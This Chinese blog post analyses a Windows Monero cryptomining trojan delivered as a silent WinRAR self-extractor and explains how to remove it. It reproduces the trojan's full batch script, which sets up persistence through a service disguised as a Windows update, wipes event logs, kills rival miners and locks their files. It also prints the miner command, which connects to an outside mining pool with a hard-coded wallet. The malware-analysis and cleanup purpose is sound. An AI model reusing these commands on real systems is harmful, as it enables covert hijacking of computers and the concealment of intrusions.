MS016小组(原创)
上一篇文章 简单讲了一下挖矿木马 大概流程 文章地址:
https://www.cnblogs.com/ms016/articles/7978880.html
今天讲分析一个挖矿木马了解ta的原理 和查杀方式 讲的是Windows挖矿木马 也是 门罗币 对比其ta挖矿木马 也许替换挖矿程序 就可以了 所以基本其ta挖矿
基本都相同 先看挖矿木马吧
其实看图标就像一个解压包 就是winrar 下的 弄成静默安装 我们用winrar 打开看看
右边的信息 代表 静默包完成什么操作
Path 运行静默包 会把里面的程序释放到 path 信息上的路径
路径 C:\Windows\daozai
Setup 运行 path路径 里面的程序
运行路径下的 run.bat 处理文件C:\Windows\daozai\run.bat
后面基本都是设置成不需要提示直接运行静默包
然后解压文件分析这几个文件做什么的
Run.bat 是启动批处理
Run64.bat 运行钱包程序的 批处理
Svchost.exe 是NSSM一款守护进程的软件
Win1ogin.exe 是挖矿程序
了解这些文件的区别就逐个分析
先看看run.bat批处理
echo Havefun C:\Windows\daozai\svchost.exe install "Windows32_Update" "C:\Windows\daozai\run64.bat" C:\Windows\daozai\svchost.exe start Windows32_Update wevtutil cl "windows powershell" wevtutil cl "security" wevtutil cl "system" echo Havefun @sc delete Systemss @sc delete Service @sc delete TeamServers @sc delete WMIserver @sc delete WMIservers @sc delete WMI @sc delete Serv @sc delete system_update @sc delete system_updatea @sc config wuauserv start= delayed-auto @echo off for %%a in ( spoolsvs.exe taskhost.exe NsCpuapl.exe MSASCui.exe nheqminer_zcash.exe nssm.exe update.exe server.exe sppscv.exe taskhost.exe acnom.exe acnon.exe control.exe install.exe kill.exe ntuhost.exe Terms.EXE winhost.exe netcore.exe Service.exe cpuminer-aes-sse42.exe Network.exe TeamServers.exe ) do taskkill /f /im %%a @echo off cacls c:\windows\Fones\Service.exe /e /d everyone cacls c:\windows\d11cache\TeamServers.exe e /d everyone cacls C\Windows\d11cache\Network.exe e /d everyone cacls c:\windows\d11cache\cpuminer-aes-sse42.exe e /d everyone cacls C:\Windows\netcore.exe e /d everyone cacls C:\Windows\winhost.exe e /d everyone cacls C:\Windows\Terms.EXE e /d everyone cacls c:\windows\ntuhost.exe e /d everyone cacls c:\windows\d11cache /e /d everyone cacls C\SysData /e /d everyone ping -n 5 127.0.0.1 taskkill /im mscorsvw.exe /f taskkill /im WUDFHost.exe /f taskkill /im nheqminer.exe /f taskkill /im NsCpuCNMiner64.exe /f taskkill /im NsCpuCNMiner.exe /f taskkill /f /im mssecsvc.exe /f taskkill /f /im taskhost.exe /f taskkill /f /im sppscv.exe /f del %sfxcmd% del %0 exit
前面是调用NSSM软件守护挖矿程序
然后启动钱包批处理
NSSM 开始守护
清除系统日志 关闭一些服务 在清理进程
里面有些进程可能 是别的挖矿大牛常用的 是为了 方便清理别人的进程
在看Run64.exe批处理
win1ogin.exe -a cryptonight -o stratum+tcp://mine.ppxxmr.com:5555 -u 42ptfGAPK5maAQELBhwiii2wbAvooRCZXCKr66rkgaDkCkRxz6oKFNv3Xg8Cdk8KiA5HNcJoey58WH9D5teiSQaF5cCgjbo+update -p 123
矿池 mine.ppxxmr.com
钱包42ptfGAPK5maAQELBhwiii2wbAvooRCZXCKr66rkgaDkCkRxz6oKFNv3Xg8Cdk8KiA5HNcJoey58WH9D5teiSQaF5cCgjbo
-p 123 参数 cpu 应该是跑3个核心
然后开始调用挖矿程序
讲完挖矿静默包的运行流程
如果种了挖矿程序怎么查杀
我点击运行Update.exe 静默包
点击运行这个静默包 本身会自身删除的 所以基本不会保留
运行完挖矿静默包 计算机的任务管理器不见了
Cmd命令 打开任务管理器打不开
友情提示: 有些挖矿 会欺骗用户 比如电脑运行缓慢 打开任务管理器
任务管理器上的cpu显示正常 关闭任务管理器 电脑又卡了
所以还是用第三方的一些管理工具查看比较好
cpu 百分之百了
挖矿程序占用最高 权限是system system是看不到的 不再administrator同一桌面
NSSM是守护进程 先把守护进程结束掉在结束掉挖矿程序
NSSM会自启动挖矿程序
NSSM会把挖矿程序写入自启动 服务里面 所以必须把这个服务停用或卸载掉
NSSM里面有卸载命令
nssm remove <servicename> confirm
卸载命令
就删除了服务
最后清理目录下的挖矿程序
黑客利用NSSM这个软件 也是方便免杀 因为这种软件 一般都不会被添加到病毒库里面
友情提示:
国外的安全厂商为了 封杀算力 大的挖矿僵尸网络 会联系矿池 管理员要求 停止支付黑客钱包 来打击黑客
@感谢刀仔提供技术支持